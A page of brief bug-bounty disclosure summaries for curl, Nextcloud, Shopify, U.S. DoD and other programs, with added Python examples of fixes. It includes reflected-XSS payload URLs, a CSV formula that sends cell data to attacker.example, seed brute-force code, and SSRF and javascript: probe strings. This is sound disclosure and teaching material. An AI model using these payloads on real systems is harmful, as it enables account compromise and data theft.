Rocket.Chat: Low authorization level at server side API operation e2e.updateGroupKey, let an attacker break the E2E architecture.
The E2E encryption feature in open.rocket.chat server had a vulnerability that allowed an attacker to break the encryption of a secure chat room. The vulnerability was caused by a low authorization level at the server-side API operation e2e.updateGroupKey, which allowed an attacker to insert or...
Nextcloud: Possibility to delete files attached to deck cards of other users
Hi everyone, Hope you are well ! I come to report here an IDOR vulnerability on the Deck application of Nextcloud, allowing to delete any attached files on any cards. Nextcloud deck app version : latest stable 1.8.0 Steps To Reproduce: The Nextcloud Deck application now offers the ability to add ...
Flickr: Exceed photo dimensions, Flickr.com
Large negative numbers could be provided as a note's width and height, which would be interpreted as positive integers and create notes beyond the normal size boundaries...
curl: CVE-2022-43551: Another HSTS bypass via IDN
Summary: I found an issue similar to CVE-2022-42916 again. Since the phenomenon is the same, I will describe the same as last time. HSTS checks are bypassed if any character in the IDN converts (Nameprep) to a '.', for example "。" (UTF-8: E38082). I think there are other characters that become "." (UTF-8: 2E) ...
Shopify: Reflected XSS In Marketing Reports Page On *.myshopify.com/admin
The returnpagepathname parameter on the marketing reports page of a Shopify store was vulnerable to reflected cross-site scripting XSS when using the javascript: protocol. The vulnerability was assessed as having high attack complexity, as specific conditions were required for the XSS to execute...
Cloudflare Public Bug Bounty: Extraction of Pages build scripts, config values, tokens, etc. via symlinks
A vulnerability was discovered in Pages build scripts that allowed malicious actors to extract build source/configuration and environment variables via symlinks due to broader permission set on certain folders within the filesystem structure. The issue was remediated by tightening permissions on...
Internet Bug Bounty: CVE-2022-42916: HSTS bypass via IDN
Original Report:https://hackerone.com/reports/1730660 Impact HSTS bypass...
Internet Bug Bounty: CVE-2022-35260: .netrc parser out-of-bounds access
Original Report:https://hackerone.com/reports/1721098 Impact If a malicious user can provide a custom netrc file to an application or otherwise affect its contents, this flaw could be used as denial-of-service...
Internet Bug Bounty: POST following PUT confusion
The bug I submitted at https://github.com/curl/curl/issues/9507 can have at least a few unintended security issues: Information Disclosure: this bug causes an HTTP PUT to occur when the user intends for an HTTP POST to occur. The user, who intended an HTTP POST, expects the POSTed information to...
MetaMask: MetaMask Browser URL and Transaction Origin Spoofing - Metamask wallet Android & Metamask wallet iOS
Vulnerability description not provided...
GitLab: Attacker is able to create,Edit & delete notes and leak the title of a victim's private personal snippet
An attacker was able to create, edit, and delete notes on a victim's private personal snippet, leaking the title of the snippet on the attacker's activity page. The attack was achieved by changing the POST parameter noteable_type from "issue" to "personalsnippet" and posting a comment within a...
Consensys: CSV Injection at https://assets-paris-demo.codefi.network/
Summary: Hi consensys Security Team. I have found CSV Injection when generate report at https://assets-paris-demo.codefi.network/ CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program such as Microsoft Excel or...
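The defence against the formula injection described above is to neutralise any cell whose first non-space character would make a spreadsheet evaluate it. The following is an added example, not code from the Consensys report or the codefi.network application; the sample rows are constructed, and prefixing with a single quote is the usual mitigation (the quote is shown as literal text by Excel and LibreOffice):

```python
import csv
import io

# Leading characters that make spreadsheet programs evaluate a cell as a
# formula. '+' and '-' matter because a formula may start with a sign, and
# TAB / CR can be used to break out of the cell in some importers.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Return a CSV-safe representation of one cell.

    Only strings are inspected: numeric columns stay numeric. A string that
    begins (after leading spaces) with a formula trigger is prefixed with a
    single quote, which spreadsheets display as literal text. The check is
    deliberately conservative: a phone number such as "+44 20" is prefixed
    too, which is harmless.
    """
    if not isinstance(value, str):
        return value
    if value.lstrip(" ").startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def export_rows(rows):
    """Write rows to CSV text with every cell neutralized.

    The csv module handles quoting of embedded quotes and separators; the
    formula guard is the only thing it does not do for us.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed report data: the "name" of the second user is attacker-controlled
# and would open a link (or worse, via DDE on older Office builds) when the
# exported report is opened in a spreadsheet.
SAMPLE_ROWS = [
    ["id", "name", "balance"],
    [1, "Alice", 120],
    [2, '=HYPERLINK("http://attacker.example/?"&A1,"click")', -5],
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_ROWS))
```

Neutralising on export is the right layer: the report generator does not know which spreadsheet will open the file, so it has to assume the most permissive one.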
TikTok: bypass two-factor authentication in Android apps and web
A vulnerability was found where a random timeout issue on a Two-Step Verification endpoint could have resulted in a potential bypass of authentication if multiple incorrect attempts were entered in quick succession. It was found that this vulnerability required access to the user's email/password...
Node.js: Permissions policies can be bypassed via process.mainModule
A vulnerability was discovered in Node.js permission policies that allowed a script to include any non-whitelisted module by calling process.mainModule.require. This could allow an attacker to bypass the limited whitelist and access internal file systems or run child processes. The vulnerability...
U.S. Department of State: Bypassing Whitelist to perform SSRF for internal host scanning
A misconfiguration in the server-side request forgery SSRF protection of geonode.state.gov allowed for bypassing the whitelist and performing internal host scanning. The backend parsed the whitelist host as a credential host, allowing requests to be sent to hosts identified before the ""...
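The bypass in the entry above works because the allowlist check and the HTTP client disagree about which part of the URL is the host: a prefix check sees the allowlisted name, while the client treats everything before "@" as userinfo and connects to the host after it. The following added example (not code from the geonode.state.gov application; the allowlist host is an assumption) shows that check beside a version that parses the URL the way the client will:

```python
from urllib.parse import urlsplit

# Constructed allowlist for the example; the real list is not on the page.
ALLOWED_HOSTS = {"maps.example.org"}


def allowed_before_fix(url: str) -> bool:
    """Prefix check of the shape the report describes.

    "http://maps.example.org@10.0.0.1:8080/" passes because the string starts
    with an allowlisted host, but an HTTP client reads "maps.example.org" as a
    username and connects to 10.0.0.1. "http://maps.example.org.evil.test/"
    passes for the same reason.
    """
    return any(
        url.startswith(f"{scheme}://{host}")
        for scheme in ("http", "https")
        for host in ALLOWED_HOSTS
    )


def allowed_after_fix(url: str) -> bool:
    """Parse first, refuse userinfo entirely, then compare the exact host."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:
        return False
    return (parts.hostname or "").lower() in ALLOWED_HOSTS


if __name__ == "__main__":
    for probe in (
        "https://maps.example.org/layers",
        "http://maps.example.org@10.0.0.1:8080/",
        "http://maps.example.org:443@10.0.0.1/",
        "https://maps.example.org.evil.test/",
    ):
        print(probe, allowed_before_fix(probe), allowed_after_fix(probe))
```

Comparing the parsed hostname is necessary but not sufficient on its own: a proxy that fetches arbitrary allowlisted names should still resolve them and refuse loopback, private and link-local addresses before connecting.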
MTN Group: Authentication bypass in https://nin.mtn.ng
Summary: In a nutshell, an authentication bypass exploits weak authentication mechanisms to allow a hacker to access your systems and data. Steps To Reproduce: 1.I was...
Nextcloud: Mail app - blind SSRF via smtpHost parameter
A blind SSRF vulnerability was discovered in the Nextcloud Mail application, allowing an attacker to retrieve services running locally on the server and scan the internal network for information. The vulnerability was found in the smtpHost parameter and could be exploited by any user with the mai...
Internet Bug Bounty: potential denial of service attack via the locale parameter
In Django 3.2 before 3.2.16, 4.0 before 4.0.8, and 4.1 before 4.1.2, internationalized URLs were subject to a denial of service attack via the locale parameter, which is treated as a regular expression. Impact By crafting a Python regex, a vulnerable site could suffer a DOS attack. The attack was...
Nextcloud: Disabled download shares still allow download through preview images
Summary: Steps To Reproduce: 1. Share a folder and disable the "Allow download" permission 2. Now as the recipient of the file you can still download the preview of the file This is an issue for images but also for shared documents where viewing them in Collabora would present them watermarked bu...
Nextcloud: Hide download previews are accessible without a watermark
A vulnerability was discovered in Nextcloud that allowed users to access download previews without a watermark, even when the watermark option was enabled. This could potentially compromise the privacy of the document and goes against the intended purpose of the feature...
Nextcloud: Insecure randomness for default password in file sharing when password policy app is disabled
The password generation function used for protecting shared links in Nextcloud was using an insecure random number generator, which could allow an attacker to access the shared files without knowledge of the password...
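A share-link password drawn from a non-cryptographic generator is only as strong as the seed, and if the seed is something guessable (the time the share was created, for instance) the attacker does not need to guess the password at all. The following added example, not Nextcloud's code and not the generator the report found, shows that failure mode beside a generator built on the operating system's CSPRNG, together with the replay an attacker would run:

```python
import math
import random
import secrets
import string
import time

ALPHABET = string.ascii_letters + string.digits


def password_before_fix(length=12, seed=None):
    """Insecure pattern: random.Random is Mersenne Twister, not a CSPRNG.

    Seeding it from the current second (the default when seed is None) is
    the assumed weakness here; with it, anyone who knows roughly when the
    share was created can regenerate the exact password offline.
    """
    rng = random.Random(seed if seed is not None else int(time.time()))
    return "".join(rng.choice(ALPHABET) for _ in range(length))


def password_after_fix(length=12):
    """secrets.choice draws from os.urandom; there is no seed to recover."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def entropy_bits(length, alphabet=ALPHABET):
    """Nominal strength of a uniformly chosen password of this length."""
    return length * math.log2(len(alphabet))


def brute_force_seed(target, window_start, window_end, length=12):
    """Attacker side: replay every candidate seed in a time window and
    return the one that reproduces the observed password, or None."""
    for seed in range(window_start, window_end):
        if password_before_fix(length, seed=seed) == target:
            return seed
    return None


if __name__ == "__main__":
    created_at = 1_700_000_000          # constructed share-creation time
    leaked = password_before_fix(seed=created_at)
    found = brute_force_seed(leaked, created_at - 3600, created_at + 3600)
    print("weak password:", leaked, "seed recovered:", found)
    print("strong password:", password_after_fix(), "bits:", round(entropy_bits(12)))
```

The nominal 71 bits of a 12-character alphanumeric password mean nothing when the effective search space is a few thousand timestamps; the fix is to change the source of randomness, not the length.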
Reddit: read and message other user's messages
Vulnerability description not provided...
Adobe: HTML INJECTION on https://adobedocs.github.io/JourneyAPI/ due to outdated SWAGGER UI
Vulnerability description not provided...
TikTok: Business Suite "Get Leads" Resulting in Revealing User Email & Phone
A vulnerability within the Business Suite settings on an Android device could have resulted in a user's email and/or phone number being revealed via the "sec_user_id" parameter if their information is sent via "Get Leads". We thank @datph4m for reporting this to our team...
Nextcloud: Mail app - Blind SSRF via Sieve server functionality and sieveHost parameter
A blind SSRF vulnerability was discovered in the Nextcloud Mail application, allowing an attacker to map the server and internal network by sending a crafted request to an unexpected destination. The vulnerability was found in the sieveHost parameter when adding a filter via a sieve filter server...
Nextcloud: CSRF vulnerability in Nextcloud Desktop Client 3.6.1 on Windows when clicking malicious link
Summary It is possible to make a user send any POST request with an arbitrary body given they click on a malicious deep link. e.g. in an email, chat link, etc This vulnerability was introduced in an attempt to fix 1720043. The patch however can be bypassed and also introduced a CSRF vulnerability...
Hyperledger: CVE-2017-5929: Hyperledger - Arbitrary Deserialization of Untrusted Data
Vulnerability Overview Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used f...
GitHub Security Lab: C/C++: Command injection via wordexp
Vulnerability description not provided...
GitHub Security Lab: [CPP]: Add query for CWE-125 Out-of-bounds Read with different interpretation of the string when use mbtowc
Vulnerability description not provided...
Flickr: IDOR may allow access to non-public photos
The IDOR vulnerability may have allowed access to non-public photos on Flickr. By adding discovered photo IDs for non-public photos uploaded by others to a Flickr group, the attacker could gain access to the third-party photos through their membership in the group...
Shopify: URL Scheme Validation Bypass in Shopify Mobile App Allows Javascript Execution
A vulnerability in the Shopify mobile application allowed bypassing URL scheme validation in the NavigationActivity component. Attackers could craft malicious URLs using data: or javascript: schemes to execute JavaScript code within the app's webview context...
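Both Shopify entries above (the reflected XSS through a return-path parameter and the mobile scheme-validation bypass) come down to the same check: a URL the user controls is handed to something that will navigate to it, and a deny-list on "javascript:" is not enough because case, embedded tab or newline characters, and alternative schemes such as data: all slip past it. The following is an added example, not Shopify's code; the parameter semantics (one value that must be a same-site path, one that may be an absolute link) are assumptions used to show the two checks a practitioner would actually want:

```python
from urllib.parse import urlsplit

SAFE_SCHEMES = {"http", "https"}
_CONTROLS = "".join(chr(c) for c in range(0x21))  # NUL..space


def _clean(url: str) -> str:
    """Normalise the way browsers do before they look at the scheme:
    tab, CR and LF are dropped anywhere, leading/trailing C0 controls and
    spaces are stripped. Checking the raw string instead is the bypass."""
    url = url.replace("\t", "").replace("\n", "").replace("\r", "")
    return url.strip(_CONTROLS)


def is_safe_before_fix(url: str) -> bool:
    """Deny-list check of the shape the two reports defeat."""
    return not url.startswith("javascript:")


def is_safe_navigation_url(url: str) -> bool:
    """Absolute link allowed to be opened: scheme allow-list after cleaning.
    Suitable for the mobile deep-link case."""
    scheme = urlsplit(_clean(url)).scheme.lower()
    return scheme in SAFE_SCHEMES


def safe_return_path(value: str, default: str = "/") -> str:
    """Value that must stay on the current origin (a "return to" pathname).

    Anything with a scheme or authority is rejected, as are protocol-relative
    "//host" and the backslash variant "/\\host" that browsers normalise to
    the same thing. Returns the default rather than raising so the caller
    always has somewhere to send the user.
    """
    cleaned = _clean(value)
    parts = urlsplit(cleaned)
    if parts.scheme or parts.netloc:
        return default
    if not cleaned.startswith("/") or cleaned.startswith(("//", "/\\")):
        return default
    return cleaned


if __name__ == "__main__":
    for probe in ("javascript:alert(1)", "JavaScript:alert(1)",
                  "java\tscript:alert(1)", " javascript:alert(1)",
                  "data:text/html,<script>alert(1)</script>",
                  "https://shop.example/admin", "//evil.example/x",
                  "/admin/reports?range=30d"):
        print(repr(probe), is_safe_before_fix(probe),
              is_safe_navigation_url(probe), repr(safe_return_path(probe)))
```

Note that a scheme allow-list on the server side does not by itself prevent the reflected XSS if the value is later written into a page unescaped; output encoding at the sink is still required. It does remove the javascript: and data: vectors from any link or redirect built from the parameter.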
Automattic: Akismet API keys are exposed by authentication method
We have switched to sending the Akismet API key as part of the request body by default. At the time of this report, Akismet API keys used formed part of the subdomain request to Akismet’s backend in the form api-key.rest.akismet.com. This means that the API key is transmitted over DNS - a protoco...
Adobe: HTML INJECTION FOUND ON https://adobedocs.github.io/analytics-1.4-apis/swagger-docs.html DUE TO OUTDATED SWAGGER UI
Responsible disclosure of HTML injection. Swagger UI has an interesting feature that allows you to provide a URL to API specification - a yaml or json file that will be fetched and displayed to the user. To do that you have to add a query parameter ?url=https://yourapispec/spec.yaml or...
U.S. Dept Of Defense: Reflected XSS | https://████████
Summary Hi team, there's a reflected XSS on https://████ using the plot param. There's a WAF in place but it's possible to bypass it. Steps to reproduce 1. Click https://██████████/fcgi-bin/getplot.py?plot=aaa%3Ch1%20onauxclick=confirm(document.domain)%3ERIGHT%20CLICK%20HERE 2. Observe the popup...
U.S. Dept Of Defense: Reflected XSS | https://████
Summary Hi team, there's a reflected XSS on https://█████████ using the project param. There's a WAF in place but it's possible to bypass it. Steps to reproduce 1. Click https://████████/fcgi-bin/release.py?project=aaa%3Ch1%20onauxclick=confirm(document.domain)%3ERIGHT%20CLICK%20HERE 2. Observe the...
Nextcloud: Mail app - blind SSRF via imapHost parameter
A blind SSRF vulnerability was discovered in the Nextcloud Mail application. An attacker could exploit this vulnerability to retrieve services running locally on the server and scan the internal network for information about which IPs are responding and which services are running on each IP...
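The three Nextcloud Mail entries (smtpHost, sieveHost, imapHost) share one root cause: a hostname typed by any user is connected to by the server, so it can point at loopback or the internal network. The check a practitioner wants is done on the resolved addresses, not the name, since "localtest.example" resolving to 127.0.0.1 is just as bad as typing the IP. The following is an added example, not Nextcloud's code; the DNS answers are constructed so it runs offline, and the address classes it refuses are an assumption about what "internal" means for the deployment:

```python
import ipaddress
import socket

# Constructed DNS answers so the example runs offline. 93.184.216.x is a
# public range used here as the "good" answer; the rest are internal.
FAKE_DNS = {
    "mail.example.net": ["93.184.216.34"],
    "localtest.example": ["127.0.0.1"],
    "meta.example": ["169.254.169.254"],
    "dual.example": ["93.184.216.35", "10.0.0.5"],
}


def resolve(host, resolver=None):
    """Return every address the name resolves to.

    With resolver=None this uses the real system resolver via getaddrinfo;
    the example passes the constructed table instead.
    """
    if resolver is not None:
        return resolver.get(host, [])
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_disallowed_address(ip: str) -> bool:
    """Refuse anything that is not a routable public address."""
    addr = ipaddress.ip_address(ip)
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_mail_host(host: str, resolver=FAKE_DNS):
    """Validate a user-supplied SMTP/IMAP/Sieve host. Returns (ok, reason).

    Accepts a hostname or an IP literal (with or without IPv6 brackets).
    Every resolved address must be public: a name with one public and one
    internal answer is refused, because the client may pick either.
    """
    host = host.strip().strip("[]")
    try:
        addrs = [str(ipaddress.ip_address(host))]
    except ValueError:
        addrs = resolve(host, resolver)
    if not addrs:
        return False, "unresolvable"
    for ip in addrs:
        if is_disallowed_address(ip):
            return False, f"{ip} is not a public address"
    return True, "ok"


if __name__ == "__main__":
    for h in ("mail.example.net", "localtest.example", "meta.example",
              "dual.example", "127.0.0.1", "[::1]", "10.0.0.5"):
        print(h, validate_mail_host(h))
```

Validating at save time is not the whole story: a name can be re-pointed after the check (DNS rebinding), so the same address test should run again on the socket actually connected, and the connection error should be reported to the user in a way that does not distinguish "refused" from "timed out" for the internal case.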
Adobe: DOM XSS at `https://adobedocs.github.io/OAE_PartnerAPI/?configUrl={site}` due to outdated Swagger UI
Vulnerability description not provided...
Adobe: DOM XSS at `https://adobedocs.github.io/indesign-api-docs/?configUrl={site}` due to outdated Swagger UI
Vulnerability description not provided...
U.S. Dept Of Defense: XSS via Client Side Template Injection on www.███/News/Speeches
Dear DoD - Team, I am able to execute javascript code on www.███████/News/Speeches. This endpoint has a search functionality with the parameter Search. The supplied value to this parameter gets embedded into the website. Furthermore the frontend of the website is presumably created with a templat...
MTN Group: Reflected XSS in chatbot
Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off of a web application to the victim's browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts Pro...
MTN Group: Wordpress users Disclosure [ /wp-json/wp/v2/users/ ]
Summary: Using REST API, we can see all the WordPress users/author with some of their information. Which can even be Personal information of employees/author. The file v2/users at: https://www.mtn.com/wp-json/wp/v2/users/ is enabled and this give the attacker many users names like: Amogelang...
LinkedIn: IDOR to make someone attend or leave an event
An Insecure Direct Object Reference IDOR vulnerability was discovered in LinkedIn's event attendance functionality. The vulnerability allowed an attacker to manipulate event attendance by modifying the fsd_profile parameter in POST requests to the voyagerScheduledcontentDashViewerStates API...
TikTok: IDOR for changing privacy settings on any memories
Vulnerability description not provided...
GitHub: Github app Privilege Escalation to Administrator/Owner of the Organization
Vulnerability description not provided...
curl: CVE-2022-42916: HSTS bypass via IDN
Summary: HSTS checks are bypassed if any character in the IDN converts (Nameprep) to a '.', for example "。" (UTF-8: E38082). I think there are other characters that become "." (UTF-8: 2E) as a result of converting with IDN. "。" (UTF-8: E38082) is converted to '.' so it doesn't matter if it's last or not. So the sa...
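The two curl entries (CVE-2022-42916 above and its CVE-2022-43551 follow-up earlier on the page) both come from doing the HSTS cache lookup on the hostname as the user typed it, before IDN conversion turned "。" into ".". The following added example, not curl's code, reproduces the mechanism with Python's standard-library idna codec, which like the Nameprep step in the report splits labels on U+3002, U+FF0E and U+FF61 as well as U+002E; the cache contents are constructed:

```python
import encodings.idna  # noqa: F401  registers the stdlib "idna" codec (IDNA2003 / Nameprep)

# Constructed HSTS cache: hosts that previously sent Strict-Transport-Security.
HSTS_HOSTS = {"example.com"}


def to_ace(hostname: str) -> str:
    """Convert a possibly-internationalised hostname to its ASCII (ACE) form.

    The codec splits on U+002E, U+3002, U+FF0E and U+FF61 before encoding
    each label, so "example。com" becomes "example.com"; the comparison key
    must be this form, never the raw input.
    """
    return hostname.encode("idna").decode("ascii").rstrip(".").lower()


def scheme_before_fix(host: str, scheme: str) -> str:
    """Lookup on the host exactly as given (the pattern the report describes).

    "example。com" is not in the cache, so the request stays plain HTTP even
    though the wire-level name after conversion is the HSTS-protected one.
    """
    if scheme == "http" and host.lower() in HSTS_HOSTS:
        return "https"
    return scheme


def scheme_after_fix(host: str, scheme: str) -> str:
    """Normalise to ACE first, then consult the cache."""
    if scheme == "http" and to_ace(host) in HSTS_HOSTS:
        return "https"
    return scheme


if __name__ == "__main__":
    for h in ("example.com", "example。com", "EXAMPLE。COM", "example\uff0ecom"):
        print(repr(h), "->", to_ace(h),
              "| before:", scheme_before_fix(h, "http"),
              "| after:", scheme_after_fix(h, "http"))
```

The general rule the two CVEs illustrate: any security decision keyed on a hostname (HSTS, cookie scope, certificate pinning, allowlists) has to be made on the same canonical form the connection will actually use.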
Cloudflare Public Bug Bounty: Cloudflare is not properly deleting user's account
Vulnerability description not provided...
Kubernetes: Ingress nginx annotation injection causes arbitrary command execution
A vulnerability was found where arbitrary commands could be executed on the Kubernetes cluster. Through annotation injection on the ingress resource, additional locations could be added to the nginx configuration, allowing commands to be passed and executed via the lua scripting engine on the...
LinkedIn: User Details Can Be Disclosed Even If The Account IS In Hibernation State
User details were disclosed via link previews on LinkedIn posts even when the account was in hibernation state...
Nextcloud: No password length limit when creating a user as an administrator
Hi, when I try to set the password while creating an account I noticed that you haven't kept any password limit. You need to decrease password length: There are two reasons for limiting the password size. For one, hashing a large amount of data can cause significant resource consumption on behalf...
HackerOne: Improper CSRF token validation allows attackers to access victim's accounts linked to Hackerone
Improper CSRF token validation in HackerOne's integration authentication server allowed attackers to access victim's accounts linked to HackerOne. This vulnerability was due to the flawed authorization flow in which the CSRF token was not properly validated, making it possible for attackers to...